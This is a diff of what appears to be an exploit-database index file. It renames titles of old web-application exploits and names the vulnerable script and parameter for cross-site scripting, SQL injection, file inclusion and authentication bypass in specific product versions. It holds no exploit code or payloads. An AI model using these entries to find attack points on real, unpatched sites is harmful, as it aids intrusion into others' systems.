-30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - 'view/search/' path Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 +30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 +30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps,0 -30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 -30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 +30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - 'calendar.php' HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 +30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - 'ShopContent.asp' Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - 'header.php?s' Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 @@ -31314,7 +31315,7 @@ id,file,description,date,author,platform,type,port 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - 'Low.php' Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 -30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - 'Lang' Cookie Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - 'Configure_Plugin.TPL.php' Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 @@ -31329,15 +31330,15 @@ id,file,description,date,author,platform,type,port 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 29525,platforms/php/webapps/29525.txt,"WordPress Theme Highlight Premium - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - 'admin.php' Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 -29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 +29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - 'FName' Information Disclosure",2007-01-26,ajann,php,webapps,0 29533,platforms/asp/webapps/29533.html,"AdMentor - Admin Login SQL Injection",2007-01-27,Cr@zy_King,asp,webapps,0 29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - 'Show_Webfeed.php' SQL Injection",2007-01-27,St[at]rExT,php,webapps,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,php,webapps,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - 'setup.php?PATH_INFO' Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - '/system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,php,webapps,0 -29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 -29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 +29679,platforms/php/webapps/29679.html,"PHPBB2 - 'Admin_Ug_Auth.php' Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 +29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - 'main.php' Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - 'post.php' Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 @@ -31349,10 +31350,10 @@ id,file,description,date,author,platform,type,port 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 -29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - '/mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 -29564,platforms/php/webapps/29564.txt,"PortailPHP 2 - '/mod_news/index.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 -29565,platforms/php/webapps/29565.txt,"PortailPHP 2 - '/mod_news/goodies.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29564,platforms/php/webapps/29564.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29565,platforms/php/webapps/29565.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions",2007-02-05,anonymous,php,webapps,0 @@ -31379,7 +31380,7 @@ id,file,description,date,author,platform,type,port 29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 -29597,platforms/asp/webapps/29597.txt,"Community Server - SearchResults.aspx Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 +29597,platforms/asp/webapps/29597.txt,"Community Server - 'SearchResults.aspx' Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - 'error.php' Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 @@ -31388,22 +31389,22 @@ id,file,description,date,author,platform,type,port 29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - 'Arcade.php' SQL Injection",2007-02-15,sp00k,php,webapps,0 29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - 'faq.php' Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0 29606,platforms/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 -29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 - unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0 -29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - 'index.php' hier Parameter Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps,0 +29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 - 'unistall.php' Authentication Bypass",2007-02-26,r00t,php,webapps,0 +29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - 'index.php?hier' Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps,0 29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0 -29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 - H_Goster.asp SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 +29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 - 'H_Goster.asp' SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router - Web-Console Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,webapps,0 29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps,0 29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 -29622,platforms/asp/webapps/29622.txt,"Design4Online - Userpages2 Page.asp SQL Injection",2007-02-20,xoron,asp,webapps,0 +29622,platforms/asp/webapps/29622.txt,"Design4Online - 'Userpages2 Page.asp' SQL Injection",2007-02-20,xoron,asp,webapps,0 29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps,0 29624,platforms/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,php,webapps,0 -29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 - 'plotStat.php' File Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 +29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 - 'preview.php?PHP_script_path' Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 -29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - 'news.php?link_Parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 -29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - 'n_layouts.php?link_Parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - 'news.php?&link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - 'n_layouts.php?link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",ios,webapps,0 @@ -31429,7 +31430,7 @@ id,file,description,date,author,platform,type,port 29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - '/data/mysqlevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,php,webapps,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php' searchkey Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 +29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php?searchkey' Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,php,webapps,0 29663,platforms/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 @@ -31440,21 +31441,21 @@ id,file,description,date,author,platform,type,port 30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 30190,platforms/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - 'Mod_Lettermansubscribe.php' Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 -30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 +30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",hardware,webapps,37777 29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,jsp,webapps,0 29675,platforms/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,asp,webapps,0 29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,php,webapps,0 -29696,platforms/php/webapps/29696.txt,"aWebNews 1.1 - 'listing.php' path_to_news Parameter Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps,0 +29696,platforms/php/webapps/29696.txt,"aWebNews 1.1 - 'listing.php?path_to_news' Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps,0 29697,platforms/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,php,webapps,0 -29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php' nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 +29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,php,webapps,0 -29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 +29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 @@ -31463,12 +31464,12 @@ id,file,description,date,author,platform,type,port 30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 -29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 +29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - 'Goster.asp' SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - '/includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - '/includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - '/includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - '/engine/init.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 @@ -31478,7 +31479,7 @@ id,file,description,date,author,platform,type,port 29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 -29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 +29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - 'PHP-Stats-options.php' Remote Code Execution",2007-03-17,rgod,php,webapps,0 29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -31486,14 +31487,14 @@ id,file,description,date,author,platform,type,port 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 +29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - 'profile.php?showuser' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - 'search.php?search_user' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 -29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php' userid Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 +29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 -29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php' AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 +29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusions",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 @@ -31520,11 +31521,11 @@ id,file,description,date,author,platform,type,port 30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - '/ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - '/ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - '/menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - '/Parameter/Parameter.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - 'param.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - '/plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30128,platforms/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php' path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30128,platforms/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30129,platforms/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - 'common.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30131,platforms/php/webapps/30131.txt,"Buttercup WFM - Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 +30131,platforms/php/webapps/30131.txt,"Buttercup WFM - 'Title' Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site Scripting",2007-06-01,"Glafkos Charalambous",php,webapps,0 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - 'chat.php?sid' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 @@ -31533,27 +31534,27 @@ id,file,description,date,author,platform,type,port 30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - '/setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 -30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - Haberoku.asp SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 +30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - 'Haberoku.asp' SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 30143,platforms/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous",php,webapps,0 30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Exploit",2013-12-08,Vulnerability-Lab,ios,webapps,0 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 30152,platforms/php/webapps/30152.txt,"My Databook - 'diary.php?delete' SQL Injection",2007-06-04,Serapis.net,php,webapps,0 30153,platforms/php/webapps/30153.txt,"My Databook - 'diary.php?year' Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps,0 